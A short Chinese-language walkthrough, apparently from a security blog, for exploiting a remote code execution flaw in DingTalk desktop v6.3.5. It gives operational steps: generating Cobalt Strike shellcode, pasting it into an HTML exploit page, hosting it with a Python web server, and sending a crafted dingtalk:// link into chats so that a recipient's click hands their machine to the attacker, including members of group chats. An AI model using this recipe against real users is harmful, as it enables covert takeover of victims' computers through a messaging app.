项目地址 https://github.com/crazy0x70/dingtalk-RCE

本次测试环境：

钉钉：DingTalk_v6.3.5.11308701

下载地址：https://dtapp-pub.dingtalk.com/dingtalk-desktop/win_installer/Release/DingTalk_v6.3.5.11308701.exe

CS：4.4 payload为32位c语言

1.生成payload

生成32为c语言格式payload

2.修改payload格式

使用编辑器打开payload，将\x修改为0x，注意使用逗号分隔

替换前

替换后

将替换后的shellcode复制到test.html中的shellcode=new Uint8Array部分，注意去掉开头的逗号

替换前

替换后

3.部署web服务

使用python开一个web服务，将替换后的test.html放入web文件夹

python3 -m http.server 80

4.钉钉发送poc

将poc发送至聊天窗口

dingtalk://dingtalkclient/page/link?url=ip:port/test.html&pc_slide=true

5.上线

点击poc即可上线，发到群里别人点需要cs和web服务部署到公网，同时非安全版本钉钉才能上线